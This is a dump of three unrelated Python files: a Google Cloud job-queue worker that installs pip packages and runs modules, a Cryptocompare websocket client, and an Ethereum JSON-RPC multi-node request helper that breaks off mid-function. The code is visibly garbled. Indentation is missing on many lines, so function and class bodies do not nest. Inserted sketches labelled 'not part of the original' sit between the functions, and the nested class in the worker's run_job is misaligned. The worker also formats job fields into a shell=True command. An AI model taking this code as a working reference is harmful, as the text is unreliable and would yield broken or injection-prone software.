worker.py
from google.cloud import firestore
from google.cloud import storage
import json
import os
from queue import Queue, Empty
import requests
from threading import Thread
import time
import subprocess
try:
    config = json.load(open('../config.json'))
except FileNotFoundError:
    config = json.load(open('config.json'))
try:
    redis_config = json.load(open('../jobServer/config.json'))
except FileNotFoundError:
    redis_config = json.load(open('jobServer/config.json'))
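# Hedged sketch (not part of the original file) of the keys this module reads
# from the two config files loaded above. The values shown are illustrative
# placeholders, not settings taken from the project:
#
#   config.json:
#       {
#           "job_queue_address": "http://localhost:5000",
#           "worker_queues": ["default"],
#           "ack_deadline": 600,
#           "ack_min": 60
#       }
#
#   jobServer/config.json:
#       {
#           "redis_auth_key": "<secret>"
#       }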
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
def call_subprocess(args, stdout_writer, stdout_reader, stderr_writer, stderr_reader, env, shell):
process = subprocess.Popen(args, stdout=stdout_writer, stderr=stderr_writer, env=env, shell=shell)
if stdout_reader is None:
stdout_reader = process.stdout
    if stderr_writer not in (None, subprocess.STDOUT) and stderr_reader is None:
        stderr_reader = process.stderr
    queue = Queue()
    t = Thread(target=enqueue_output, args=(stdout_reader, queue))
    t.daemon = True  # thread dies with the program
    t.start()
    # Only read stderr on its own thread when it is a real, separate stream
    # (not merged into stdout via subprocess.STDOUT and not discarded).
    if stderr_reader is not None and stderr_reader is not subprocess.STDOUT:
        t = Thread(target=enqueue_output, args=(stderr_reader, queue))
        t.daemon = True  # thread dies with the program
        t.start()
while process.poll() is None or not queue.empty():
try:
print(str(queue.get(timeout=0.1), 'utf-8'), end='')
except Empty:
pass
return process
def subprocess_live_output(args, env=None, use_shell=False,
stdout_path=None, stderr_path=None, include_stderr=True):
stdout_writer = stdout_reader = stderr_writer = stderr_reader = None
if stdout_path is not None:
stdout_writer = open(stdout_path, 'wb')
stdout_reader = open(stdout_path, 'rb', 1)
        if include_stderr:
            # With no separate stderr file given, merge stderr into the stdout
            # file; otherwise capture stderr in its own file.
            if stderr_path is None:
                stderr_writer = subprocess.STDOUT
                stderr_reader = subprocess.STDOUT
            else:
                stderr_writer = open(stderr_path, 'wb')
                stderr_reader = open(stderr_path, 'rb', 1)
else:
stderr_writer = None
stderr_reader = None
else:
stdout_writer = subprocess.PIPE
stdout_reader = None
        if include_stderr:
            stderr_writer = subprocess.PIPE
            stderr_reader = None
        else:
            stderr_writer = None
            stderr_reader = None
try:
process = call_subprocess(args, stdout_writer, stdout_reader, stderr_writer, stderr_reader, env, use_shell)
finally: # make sure that files are properly closed
if stdout_path is not None:
if stdout_writer is not None:
stdout_writer.close()
if stdout_reader is not None:
stdout_reader.close()
        if stderr_path is not None:
            if stderr_writer is not None:
                stderr_writer.close()
            if stderr_reader is not None:
                stderr_reader.close()
process.poll()
return process
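# Hedged usage sketch (not part of the original worker): shows how
# subprocess_live_output can stream a child process's combined output while it
# runs. The command and log path below are illustrative assumptions.
def _example_stream_child_output():
    log_path = os.path.expanduser('~/example_child.log')
    proc = subprocess_live_output(['python', '-c', 'print("hello from child")'],
                                  include_stderr=True,
                                  stdout_path=log_path)
    return proc.returncode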
def run_python_script(main_module, code_location, arguments=[], packages=[], env=None,
use_shell=[False, False], see_output=[False, False],
use_files=[False, False], concurrent_callback=[None, None]):
    if env is None:
        # Callers may omit env; PYTHONPATH is added below, so start from the current environment
        env = os.environ.copy()
    packages_dir = os.path.expanduser('~/packages')
    package_process = None
    if len(packages) > 0:
        args = ['python', '-m', 'pip', 'install', '--upgrade',
                '--ignore-installed', '--target', packages_dir] + packages
        if use_files[0]:
            stdout = os.path.expanduser("~/package_install.stdout")
            stderr = os.path.expanduser("~/package_install.stderr")
        else:
            stdout = None
            stderr = None
        if see_output[0]:
            process = subprocess_live_output(args, env=env, use_shell=use_shell[0],
                                             include_stderr=True,
                                             stdout_path=stdout,
                                             stderr_path=stderr)
        else:
            # subprocess.run expects file objects (or None), not path strings
            out_file = open(stdout, 'wb') if stdout else None
            err_file = open(stderr, 'wb') if stderr else None
            process = subprocess.run(args, env=env, shell=use_shell[0],
                                     stdout=out_file, stderr=err_file)
        if "PYTHONPATH" in env:
            env["PYTHONPATH"] = env["PYTHONPATH"] + ':' + packages_dir
        else:
            env["PYTHONPATH"] = packages_dir
        package_process = process.returncode
        if package_process is not None and package_process != 0:
            return package_process, None
python_call = ['python', '-m', main_module]
if len(arguments) > 0: python_call += arguments
if "PYTHONPATH" in env:
env["PYTHONPATH"] = code_location + ':' + env["PYTHONPATH"]
else:
env["PYTHONPATH"] = code_location
    if use_files[1]:
        stdout = os.path.expanduser("~/python_run.stdout")
        stderr = os.path.expanduser("~/python_run.stderr")
    else:
        stdout = None
        stderr = None
    if see_output[1]:
        process = subprocess_live_output(python_call, env=env, use_shell=use_shell[1],
                                         include_stderr=True,
                                         stdout_path=stdout,
                                         stderr_path=stderr)
    else:
        # subprocess.run expects file objects (or None), not path strings
        out_file = open(stdout, 'wb') if stdout else None
        err_file = open(stderr, 'wb') if stderr else None
        process = subprocess.run(python_call, env=env, shell=use_shell[1],
                                 stdout=out_file, stderr=err_file)
return package_process, process.returncode
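# Hedged usage sketch (not part of the original worker): runs a module the way
# run_job does below. The module name and code directory are illustrative
# assumptions; the function returns (pip_returncode, script_returncode).
def _example_run_python_script():
    package_rc, script_rc = run_python_script('platform',
                                              os.path.expanduser('~/code'),
                                              env=os.environ.copy(),
                                              see_output=[False, False],
                                              use_files=[False, False])
    return package_rc, script_rc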
def check_message(message, job_ref):
# return job_ref.get(u'state') != u'RUNNING'
return True
def create_job(message, job_ref):
job_ref.update({u'state': u'RUNNING'})
    with open(os.path.expanduser('~/job_id'), 'w') as file:
        file.write(str(message['id']))
def run_job(message, job_ref):
    # Read the job document as a snapshot; field reads go through the snapshot,
    # not the DocumentReference itself.
    job = job_ref.get()
    arguments = job.get(u'arguments')
    module = job.get(u'python_module')
    code_path = job.get(u'cloud_storage_path')
    packages = job.get(u'pip_packages')
    code_dir = os.path.expanduser('~/code')
    archive_path = os.path.join(code_dir, 'code.tar.gz')
    # shell=True expects a single command string; passing a list here would only run 'mkdir'
    subprocess.run('mkdir -p {dir} ; gsutil cp {src} {dst} ; tar -xf {dst} -C {dir}'.format(
                       dir=code_dir, src=code_path, dst=archive_path),
                   shell=True)
class ACKDEADLINE_EXTEND():
        def __init__(self, message, ack_deadline=config['ack_deadline'], ack_min=config['ack_min']):
self.first_call = True
self.message = message
self.ack_deadline = ack_deadline
self.ack_min = ack_min
self.message.modify_ack_deadline(self.ack_deadline)
self.get_time = lambda: time.time()
self.start_time = self.get_time()
        def __call__(self):
            current_time = self.get_time()
            # Re-extend the ack deadline once at least ack_min seconds have
            # passed since the last extension.
            if current_time - self.start_time >= self.ack_min:
                self.start_time = current_time
                self.message.modify_ack_deadline(self.ack_deadline)
    process = run_python_script(module, code_dir, env=os.environ.copy(),
                                arguments=arguments, packages=packages,
                                use_files=[True, True], concurrent_callback=[None, ACKDEADLINE_EXTEND(message)])
    # run_python_script returns (package_returncode, script_returncode)
    return process[1]
def teardown_job(message, job_ref):
job_ref.update({u'state': u'COMPLETED'})
    os.remove(os.path.expanduser('~/job_id'))
requests.put('{}/job/{}/completed'.format(config['job_queue_address'], message['id']),
headers={'auth_key': redis_config['redis_auth_key']})
def handle_message(message):
db = firestore.Client()
    # message is a plain dict decoded from the job server's JSON payload
    database_job_location = message['data']
job_ref = db.document(database_job_location)
if not check_message(message, job_ref):
return
create_job(message, job_ref)
run_job(message, job_ref)
teardown_job(message, job_ref)
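# Hedged sketch (not part of the original worker) of the Firestore job document
# that handle_message/run_job expect, based on the fields read above. The
# values are illustrative assumptions, not taken from a real job.
EXAMPLE_JOB_DOCUMENT = {
    u'state': u'QUEUED',
    u'python_module': u'trainer.main',
    u'cloud_storage_path': u'gs://my-bucket/jobs/code.tar.gz',
    u'pip_packages': [u'numpy'],
    u'arguments': [u'--epochs', u'10'],
}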
if __name__ == '__main__':
while True:
for queue in config['worker_queues']:
response = requests.put('{}/queue/{}/pop'.format(config['job_queue_address'], queue),
headers={'auth_key': redis_config['redis_auth_key']})
job = json.loads(response.text)
handle_message(job['payload'])
time.sleep(1)
core.py
# -*- coding: utf-8 -*-
import logging
import time
from requests.exceptions import ConnectionError
from threading import Thread
import pymongo
import requests
import json
import sys
import socketIO_client
from . import masks
from . import customized_methods
from six import iteritems
from six import string_types as basestring
setattr(socketIO_client.transports.XHR_PollingTransport,
'recv_packet', customized_methods.custom_recv_packet)
class CryptocompareClient(object):
def __init__(self, sub_strings=None, websocket_url='https://streamer.cryptocompare.com',
mongo_col=None, namespace=None):
"""CryptocompareClient connects to the Websocket and Rest APIs of Cryptocompare.
Args:
sub_strings (optional): Websocket subscriptions, defaults to None.
The strings must have the format
'{SubscriptionId}~{ExchangeName}~{FromSymbol}~{ToSymbol}'
                sub_strings must either be a list of strings or a single string
websocket_url (optional): The url used to connect to the websocket.
Defaults to 'https://streamer.cryptocompare.com'
mongo_col (optional): MongoDB (pymongo) collection to insert messages into.
Defaults to None
namespace (optional): socketIO Namespace used to handle events.
Defaults to None.
"""
# define initial btc and eth prices
self.btc = 0
self.eth = 0
if isinstance(sub_strings, basestring):
sub_strings = [sub_strings]
if isinstance(sub_strings, list):
self.sub_strings = sub_strings[:]
else:
self.sub_strings = sub_strings
self.url = websocket_url
self.mongo_col = mongo_col
self.namespace = namespace
        self.restart_after = None
        # Timestamps of received messages; used by listen()'s restart_after watchdog
        self.received_messages = []
self._init_websocket()
def _init_websocket(self):
if self.namespace is None:
self.socket = socketIO_client.SocketIO(self.url)
else:
self.socket = socketIO_client.SocketIO(self.url, Namespace=self.namespace)
self.socket.on('m', self._on_message)
if self.sub_strings is not None:
self.subscribe(sub_strings=self.sub_strings[:])
def restart(self):
"""Restart websocket"""
logging.info("Restarting Cryptocompare Client...")
self.stop()
if hasattr(self, "thread"):
self.thread.join()
self._init_websocket()
        self.listen(getattr(self, "seconds", None), self.restart_after)
def listen(self, seconds=None, restart_after=None):
"""Start listening to the websocket.
Args:
seconds: Number of seconds to listen. Defaults to None.
If not specified, client will listen forever.
restart_after: Number of seconds to wait until restart,
when no messages are received. If not specified,
client will not restart.
"""
self.seconds = seconds
self.restart_after = restart_after
self.start_time = time.time()
self.received_messages = []
if restart_after is None:
if self.seconds is not None:
self.socket.wait(seconds=seconds)
else:
self.socket.wait()
else:
def _wait_thread():
if self.seconds is not None:
self.socket.wait(seconds=seconds)
else:
self.socket.wait()
self.thread = Thread(target=_wait_thread)
self.thread.start()
            try:
                time.sleep(restart_after)
                while True:
                    # filter() returns an iterator in Python 3, so build a list before len()
                    n_messages = len([message_time for message_time in self.received_messages
                                      if time.time() - message_time < restart_after])
                    logging.debug("Number of messages in last %s seconds: %s",
                                  restart_after, n_messages)
                    if n_messages == 0:
                        self.restart()
                        break
                    time.sleep(1)
except KeyboardInterrupt:
logging.debug("KeyboardInterrupt: Stopping...")
self.stop()
self.thread.join()
def stop(self):
"""Disconnect websocket"""
self.socket.disconnect()
def get_coin_list(self, base_url='https://www.cryptocompare.com/api/data/'):
"""Return coin list, see https://www.cryptocompare.com/api/#-api-data-coinlist-"""
r = requests.get('{}coinlist/'.format(base_url))
if r.status_code == 200:
return r.json()
else:
return r.status_code
def get_coin_snapshot(self, fsym, tsym, base_url='https://www.cryptocompare.com/api/data/'):
"""Return coin snapshot, see https://www.cryptocompare.com/api/#-api-data-coinsnapshot-"""
r = requests.get('{}coinsnapshot/?fsym={}&tsym={}'.format(base_url,fsym,tsym))
if r.status_code == 200:
return r.json()
else:
return r.status_code
def get_top_pairs(self, fsym, limit=2000, base_url='https://min-api.cryptocompare.com/data/'):
"""Return top currency pairs by volume, see https://www.cryptocompare.com/api/#-api-data-toppairs-"""
r = requests.get('{}top/pairs?fsym={}&limit={}'.format(base_url, fsym, limit))
if r.status_code == 200:
return r.json()
else:
return r.status_code
def get_all_coins(self, base_url='https://www.cryptocompare.com/api/data/'):
"""Return a list of all coins that are available on CryptoCompare"""
coin_list = self.get_coin_list(base_url=base_url)
return [coin for coin,d in iteritems(coin_list['Data'])]
def get_all_exchanges(self, fsym, tsym, base_url='https://www.cryptocompare.com/api/data/'):
"""Return a list of all exchanges that trade a currency pair"""
res = self.get_coin_snapshot(fsym, tsym, base_url=base_url)
try:
exchanges = res['Data']['Exchanges']
markets = [x['MARKET'] for x in exchanges]
return sorted(markets)
except KeyError:
return res
def query_rest_api(self, api_name, base_url='https://min-api.cryptocompare.com/data/', **params):
"""Query the Rest API with specified params"""
query_params = '&'.join(['{}={}'.format(k,v) for k,v in iteritems(params)])
query_string = base_url + api_name + '?' + query_params
r = requests.get(query_string)
if r.status_code == 200:
return r.json()
else:
return r.status_code
def subscribe(self, method=None, exchange=None, currency_pair=None, sub_strings=None):
"""Subscribe to websocket channels
The channels must either be specified by the parameter sub_strings or by a combination
of the parameters method, exchange and currency_pair.
Args:
method (optional): The method must either be 'TRADE', 'CURRENT', 'CURRENTAGG' or
                one of the corresponding SubscriptionIds (0, 2, or 5).
See https://www.cryptocompare.com/api/#-api-web-socket-subscribe- for more
information.
exchange (optional): A valid exchange name that is recognized by the cryptocompare API.
currency_pair (optional): A tuple of currency symbols that are recognized by the
cryptocompare API, such as ('BTC','USD')
sub_strings (optional): Subscription strings in the format
'{SubscriptionId}~{ExchangeName}~{FromSymbol}~{ToSymbol}'.
                sub_strings must either be a list of strings or a single string.
"""
if method is None and exchange is None and currency_pair is None and sub_strings is None:
raise ValueError("Either sub_strings or method, exchange, and currency_pair must be specified.")
elif sub_strings is not None:
if method is not None or exchange is not None or currency_pair is not None:
raise ValueError("If sub_strings is specified, all other keyword arguments must be None.")
if isinstance(sub_strings, basestring):
sub_strings = [sub_strings]
elif method is None or exchange is None or currency_pair is None:
raise ValueError("If sub_strings is None, all other keyword arguments must be specified.")
else:
method = self._convert_method_to_number(method)
sub_strings = ['{}~{}~{}~{}'.format(method,
exchange,
currency_pair[0],
currency_pair[1])]
if self.sub_strings is None:
self.sub_strings = []
self.sub_strings.extend(sub_strings)
self.sub_strings = list(set(self.sub_strings))
try:
self.socket.emit('SubAdd', { 'subs': sub_strings })
except ConnectionError as e:
logging.info("ConnectionError: %s", e)
self.restart()
def unsubscribe(self, method=None, exchange=None, currency_pair=None, sub_strings=None):
"""Unubscribe from websocket channels
The channels must either be specified by the parameter sub_strings or by a combination
of the parameters method, exchange and currency_pair.
Args:
method (optional): The method must either be 'TRADE', 'CURRENT', 'CURRENTAGG' or
                one of the corresponding SubscriptionIds (0, 2, or 5).
See https://www.cryptocompare.com/api/#-api-web-socket-subscribe- for more
information.
exchange (optional): A valid exchange name that is recognized by the cryptocompare API.
currency_pair (optional): A tuple of currency symbols that are recognized by the
cryptocompare API, such as ('BTC','USD')
sub_strings (optional): Subscription strings in the format
'{SubscriptionId}~{ExchangeName}~{FromSymbol}~{ToSymbol}'.
                sub_strings must either be a list of strings or a single string.
"""
if sub_strings is not None:
if isinstance(sub_strings, basestring):
sub_strings = [sub_strings]
self.socket.emit('SubRemove', { 'subs': sub_strings })
else:
method = self._convert_method_to_number(method)
sub_strings = ['{}~{}~{}~{}'.format(method,
exchange,
currency_pair[0],
currency_pair[1])]
self.socket.emit('SubRemove', { 'subs': sub_strings })
def unsubscribe_all(self):
"""Unsubscribe from all channels that have been subscribed"""
self.socket.emit('SubRemove', { 'subs': self.sub_strings })
def _convert_method_to_number(self, method):
"""Convert method name to corresponding SubscriptionId"""
if str(method).upper() not in ['0', '2', '5', 'TRADE', 'CURRENT', 'CURRENTAGG']:
raise ValueError('Method has invalid value: {}'.format(method))
if str(method).upper() == 'TRADE' :
method = '0'
elif str(method).upper() == 'CURRENT':
method = '2'
elif str(method).upper() == 'CURRENTAGG':
method = '5'
return method
def _parse_message(self, response):
"""Parse a message received through websocket and return dictionary
Args:
response (str): The raw message
"""
response_list = response.split('~')
sub_id = response_list[0]
try:
if sub_id == '0': # TRADE
keys = ['SubscriptionId','ExchangeName','Symbol','CurrencySymbol','Flag','TradeId','TimeStamp','Quantity','Price','Total']
res = dict(zip(keys, response_list))
elif sub_id == '2' or sub_id == '5': # CURRENT / CURRENTAGG
unpacked = {}
mask = int(response_list[-1], 16)
i = 0
for key,value in masks.current:
if value == 0 or mask & value:
unpacked[key] = response_list[i]
i += 1
res = unpacked
else:
logging.debug("Unknown sub_id in message: %s", response)
res = None
        except Exception:
logging.warning("Parsing failed for: %s", response)
res = None
return res
    def _on_message(self, *args):
        """Handle received messages and write to MongoDB if mongo_col was specified"""
        # Record the arrival time so the restart_after watchdog in listen() can
        # detect a stalled connection.
        self.received_messages.append(time.time())
        parsed_message = self._parse_message(args[0])
        if parsed_message is None:
            logging.debug("Could not parse message: %s", args[0])
            return
        logging.debug("Received message: %s", parsed_message)
        parsed_message = self.process_message(parsed_message)
        if self.mongo_col is not None:
            self.mongo_col.insert_one(parsed_message)
def process_message(self, msg):
"""Override this method to alter or handle incoming messages"""
if self.mongo_col is None:
print(msg)
return msg
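# Hedged usage sketch (not part of the original module): subscribes to trade
# messages for a single pair and listens for a minute. The exchange name below
# is an illustrative assumption; the subscription string format
# '{SubscriptionId}~{ExchangeName}~{FromSymbol}~{ToSymbol}' comes from the
# docstrings above.
def _example_listen_for_trades():
    client = CryptocompareClient(sub_strings='0~Coinbase~BTC~USD')
    client.listen(seconds=60)
    client.stop()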
core.py
import copy
import json
import threading
import time
import traceback
from random import randint
from threading import Lock
import requests
import rlp
from ethereum import transactions
from web3 import Web3
LengthOfDataProperty = 64
LengthOfPrivateKey = 64
LengthOfPublicAddress_Including0x = 42
LengthOfPublicAddress_Excludes0x = 40
LengthOfTransactionHash_Including0x = 66
LengthOfTransactionHash_Excludes0x = 64
Headers = {'content-type': 'application/json'}
RequestTimeout_seconds = 5
def ConvertIntToHex(number_int):
return "%x" % int(number_int)
def MergeDictionaries(x, y):
z = x.copy() # start with x's keys and values
z.update(y) # modifies z with y's keys and values & returns None
return z
def SendRequestToAllNodes(payload, headers, requestTimeout_seconds, resultHandlerDelegate=None,
doSetBlockNumber_BasedOnLatestBlockNumber_int=True,
requiredToWaitForAllNodesResponsesBeforeYouConsiderResults=False,
payloadIsBatched=False, doRejectBatchedPayloadIfAnyOneHasError=True, specifiedBlockNumber_int=None):
from Libraries.nodes import RemoteNodeList
return SendRequestToSpecifiedNodes(RemoteNodeList, payload, headers, requestTimeout_seconds, resultHandlerDelegate,
doSetBlockNumber_BasedOnLatestBlockNumber_int,
requiredToWaitForAllNodesResponsesBeforeYouConsiderResults,
payloadIsBatched, doRejectBatchedPayloadIfAnyOneHasError, specifiedBlockNumber_int)
def SendRequestToSpecifiedNodes(remoteNodeList_toUse, payload, headers, requestTimeout_seconds, resultHandlerDelegate=None,
doSetBlockNumber_BasedOnLatestBlockNumber_int=True,
requiredToWaitForAllNodesResponsesBeforeYouConsiderResults=False,
payloadIsBatched=False, doRejectBatchedPayloadIfAnyOneHasError=True, specifiedBlockNumber_int=None):
global LatestBlockNumber_int
if doSetBlockNumber_BasedOnLatestBlockNumber_int and specifiedBlockNumber_int:
print("Setting both of these is not valid. Only one can be set: doSetBlockNumber_BasedOnLatestBlockNumber_int "
"and specifiedBlockNumber_int. Overriding doSetBlockNumber_BasedOnLatestBlockNumber_int to False.")
doSetBlockNumber_BasedOnLatestBlockNumber_int = False
numOfBatchedRequests = 0
if payloadIsBatched:
numOfBatchedRequests = len(payload)
# print("SendRequestToSpecifiedNodes: numOfBatchedRequests = " + str(numOfBatchedRequests))
threads = []
resultDict = {}
lock_resultDict = Lock()
numOfExpectedResults = len(remoteNodeList_toUse)
for remoteNode in remoteNodeList_toUse:
# Reverse the order, instead of going for 0, 1, 2, 3... Go 3, 2, 1, 0
resultKey = str(remoteNode.name)
        blockNumber_toUse = None
        if specifiedBlockNumber_int:
            # JSON-RPC block numbers are passed as hex strings
            blockNumber_toUse = '0x' + ConvertIntToHex(specifiedBlockNumber_int)
        # Execute the call with this blockNumber_toUse
# print("SendRequestToSpecifiedNodes: node = " + str(remoteNode.name) + ", payload = " + str(payload))
t = threading.Thread(target=SubmitRequest, args=(Get_RemoteEthereumNodeToUse(remoteNode), payload, payloadIsBatched, headers, requestTimeout_seconds,
blockNumber_toUse, resultDict, resultKey, lock_resultDict,))
t.start()
threads.append(t)
# TODO, Instead of doing a .join and waiting for all to finish.
# Some may timeout, so I want to proceed as soon as at least one valid response comes in.
# Don't wait for many valid responses or else i'll lag everything
# for thread in threads:
# thread.join()
elapsedTime_ms = 0
timeout_ms = requestTimeout_seconds * 1000
# Keep this low, as long as we don't have a million print/log statements. The more print/log statements the more it will slow everything down
sleepTime_ms = 5
sleepTime_s = sleepTime_ms / 1000
foundValidRecentResponse = False
currentResultDictLength = 0
previousResultDictLength = 0
while elapsedTime_ms < timeout_ms:
# Create a copy so it's threadsafe, we need to do this because new data could come in at any moment since i'm making so many requests
lock_resultDict.acquire()
try:
resultDict_copy = copy.deepcopy(resultDict)
finally:
lock_resultDict.release()
currentResultDictLength = len(resultDict_copy)
# print("resultDict_copy, waiting for responses. We have " + str(currentResultDictLength) + " of " + str(numOfExpectedResults) + " = " + str(resultDict_copy))
if currentResultDictLength == numOfExpectedResults:
# print("Received all responses, breaking from loop")
break
# Consider breaking if i've found a result that satisfies me.
# Tricky thing is, some calls will want to wait for all results to come in before it analyzes results and some calls are willing to go with the first good looking result.
# So check the requiredToWaitForAllNodesResponsesBeforeYouConsiderResults flag
elif not requiredToWaitForAllNodesResponsesBeforeYouConsiderResults:
if currentResultDictLength > 0:
# if not resultHandlerDelegate and currentResultDictLength > 0:
# print("currentResultDictLength = " + str(currentResultDictLength) + ", previousResultDictLength = " + str(previousResultDictLength))
# Only call DetermineMostRecentValidResponseFromResultDict when we have new data
if currentResultDictLength == previousResultDictLength:
# print("Not calling DetermineMostRecentValidResponseFromResultDict because we don't have any new data since last time through the loop")
pass
else:
# Set the previous now that we have new data
previousResultDictLength = currentResultDictLength
# print("Calling DetermineMostRecentValidResponseFromResultDict because we have have new data since last time through the loop")
# print("We haven't yet received all responses but let's check to see if the responses we received are valid enough")
# Call DetermineMostRecentValidResponseFromResultDict but do not yet raise an exception if it's not valid because we're still waiting for some API calls to return
if DetermineMostRecentValidResponseFromResultDict(resultDict_copy, remoteNodeList_toUse,
doSetBlockNumber_BasedOnLatestBlockNumber_int,
payloadIsBatched, numOfBatchedRequests, doRejectBatchedPayloadIfAnyOneHasError,
False):
# print("We found a valid recent response! Breaking despite not yet receiving all responses")
foundValidRecentResponse = True
break
time.sleep(sleepTime_s)
elapsedTime_ms += sleepTime_ms
# if not foundValidRecentResponse and currentResultDictLength != numOfExpectedResults:
# print("Timed out before we received all responses")
# Create a copy so it's threadsafe, we need to do this because new data could come in at any moment since i'm making so many requests
lock_resultDict.acquire()
try:
resultDict_copy = copy.deepcopy(resultDict)
finally:
lock_resultDict.release()
firstNcharacters = 500
# This print statement will show me which nodes got success responses and which got timeouts or known errors we're catching
if not payloadIsBatched:
print("SendRequestToSpecifiedNodes: resultDict for " + str(payload['method']) + " = " + str(resultDict_copy))
# # This below loop with print statements will show me the content in each response for each node
# for resultKey in resultDict_copy:
# if hasattr(resultDict_copy[resultKey], 'content'):
# print("SendRequestToSpecifiedNodes: resultDict w/ content = " + str(resultDict_copy[resultKey].content)[0:firstNcharacters] + "...")
# else:
# print("SendRequestToSpecifiedNodes: resultDict w/ string value = " + str(resultDict_copy[resultKey])[0:firstNcharacters] + "...")
else:
listOfMethods = []
for batchedPayload in payload:
listOfMethods.append(batchedPayload['method'])
print("SendRequestToSpecifiedNodes: resultDict for " + str(listOfMethods) + " = " + str(resultDict_copy))
# # This below loop with print statements will show me the content in each response for each node
# for resultKey in resultDict_copy:
# if hasattr(resultDict_copy[resultKey], 'content'):
# print("SendRequestToSpecifiedNodes: resultDict w/ content = " + str(resultDict_copy[resultKey].content)[0:firstNcharacters] + "...")
# else:
# print("SendRequestToSpecifiedNodes: resultDict w/ string value = " + str(resultDict_copy[resultKey])[0:firstNcharacters] + "...")
if resultHandlerDelegate:
# print("SendRequestToSpecifiedNodes: calling resultHandlerDelegate")
return resultHandlerDelegate(resultDict_copy)
else:
# Create a copy so it's threadsafe, we need to do this because new data could come in at any moment since i'm making so many requests
lock_resultDict.acquire()
try:
resultDict_copy = copy.deepcopy(resultDict)
finally:
lock_resultDict.release()
# print("SendRequestToSpecifiedNodes: returning DetermineMostRecentValidResponseFromResultDict")
return DetermineMostRecentValidResponseFromResultDict(resultDict_copy, remoteNodeList_toUse,
doSetBlockNumber_BasedOnLatestBlockNumber_int,
payloadIsBatched, numOfBatchedRequests, doRejectBatchedPayloadIfAnyOneHasError)
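# Hedged sketch (not part of the original module) of the resultHandlerDelegate
# interface used by SendRequestToSpecifiedNodes: the delegate receives the
# per-node resultDict copy and returns whichever response it considers best.
# This trivial delegate just returns the first response that has content.
def ExampleResultHandlerDelegate_FirstResponseWithContent(resultDict):
    for resultKey in resultDict:
        if hasattr(resultDict[resultKey], 'content'):
            return resultDict[resultKey]
    return None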
def DetermineMostRecentValidResponseFromResultDict(resultDict, remoteNodeList,
doSetBlockNumber_BasedOnLatestBlockNumber_int,
payloadIsBatched, numOfBatchedRequests, doRejectBatchedPayloadIfAnyOneHasError,
doRaiseExceptionIfNotValid=True):
# So here the resultDict contains a bunch of results. Some are valid and some are not. Of the valid ones, some are for different block numbers.
# Find the most recent valid one
doPrintDebug = False
# If we have many batched responses per node call
if payloadIsBatched:
mostRecentValidResponse = None
resultKeyForMostRecentValidResponse = None
for resultKey in resultDict:
resultString = None
if not hasattr(resultDict[resultKey], 'content'):
resultString = "ERROR, Could not parse response into JSON"
else:
responseData = resultDict[resultKey].content
jData = json.loads(responseData)
# Count how many times a response failed
count_failed = 0
# Increment the fails for each time a response didn't come in per a request
numOfBatchedResponses = len(jData)
count_failed += numOfBatchedRequests - numOfBatchedResponses
for batchedJData in jData:
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: Found result batchedJData: " + str(batchedJData))
if 'error' in batchedJData:
resultString = str(batchedJData['error'])
count_failed += 1
elif 'result' in batchedJData and batchedJData['result'] and str(batchedJData['result']).lower() != "null" and str(
batchedJData['result']).lower() != "0x":
resultString = str(batchedJData['result'])
else:
resultString = "ERROR, Could not find result in response"
count_failed += 1
# Once it's all done iterating over the batched responses, if count_failed is still zero
if count_failed == 0 or not doRejectBatchedPayloadIfAnyOneHasError:
# Then assume we have good data
mostRecentValidResponse = resultDict[resultKey]
resultKeyForMostRecentValidResponse = resultKey
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: numOfBatchedRequests = " + str(numOfBatchedRequests) + ", numOfBatchedResponses = " + str(
numOfBatchedResponses) + ", count_failed = " + str(count_failed) + " after iterating over all batched responses")
print("DetermineMostRecentValidResponseFromResultDict: Found result: " + str(resultString))
if mostRecentValidResponse:
return mostRecentValidResponse
else:
# I cannot return anything since this is not a valid response
return None
# Else we have only one response to deal with per node call
else:
mostRecentValidResponse = None
highestBlockNumber = 0
resultKeyForMostRecentValidResponse = None
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: resultDict = " + str(resultDict))
print("DetermineMostRecentValidResponseFromResultDict: remoteNodeList = " + str(remoteNodeList))
for resultKey in resultDict:
resultString = None
if not hasattr(resultDict[resultKey], 'content'):
resultString = "ERROR, Could not parse response into JSON"
else:
responseData = resultDict[resultKey].content
jData = json.loads(responseData)
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: Found result jData: " + str(jData))
if 'error' in jData:
resultString = str(jData['error'])
elif 'result' in jData and jData['result'] and str(jData['result']).lower() != "null" and str(jData['result']).lower() != "0x":
resultString = str(jData['result'])
# If we're making the call based on a specific block number then I should verify the block number before I say it's valid
if doSetBlockNumber_BasedOnLatestBlockNumber_int:
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: Analyzing mostRecentValidResponse = " + str(
mostRecentValidResponse) + ", highestBlockNumber = " + str(highestBlockNumber) + ", resultKey = " + str(resultKey))
# Verify the block number before I assume it's valid
if not mostRecentValidResponse:
mostRecentValidResponse = resultDict[resultKey]
resultKeyForMostRecentValidResponse = resultKey
# Else we're making the call based on the 'latest' instead of a specific block number
else:
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: Analyzing mostRecentValidResponse = " + str(
mostRecentValidResponse) + ", highestBlockNumber = " + str(highestBlockNumber) + ", resultKey = " + str(resultKey))
mostRecentValidResponse = resultDict[resultKey]
highestBlockNumber = None
resultKeyForMostRecentValidResponse = resultKey
else:
resultString = "ERROR, Could not find result in response"
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: Found result: " + str(resultString))
if mostRecentValidResponse:
# We're making the call based on the 'latest' instead of a specific block number
return mostRecentValidResponse
else:
if doRaiseExceptionIfNotValid:
message = "DetermineMostRecentValidResponseFromResultDict: Did not find a valid response in SendRequestToSpecifiedNodes out of " + str(
len(remoteNodeList)) + " nodes"
raise Exception(message)
def RemovePropertyFromPayloadParams(property, payload):
if property in payload['params']:
payload['params'].remove(property)
def SubmitRequest(url, payload, payloadIsBatched, headers, requestTimeout_seconds, blockNumber_toUse, resultDict, resultKey, lock_resultDict=None):
# Make a copy of the payload object and modify the copy
payload_copyToUse = copy.deepcopy(payload)
if not payloadIsBatched:
# Set the id if it's not already set
if 'id' not in payload_copyToUse:
# Set the id to the payload_copyToUse
payload_copyToUse['id'] = (randint(0, 999999999999999))
# Clear these block number properties. Make sure block properties like 'latest', 'pending', etc are not in the params
RemovePropertyFromPayloadParams('latest', payload_copyToUse)
RemovePropertyFromPayloadParams('pending', payload_copyToUse)
RemovePropertyFromPayloadParams('earliest', payload_copyToUse)
else:
for batchedPayload in payload_copyToUse:
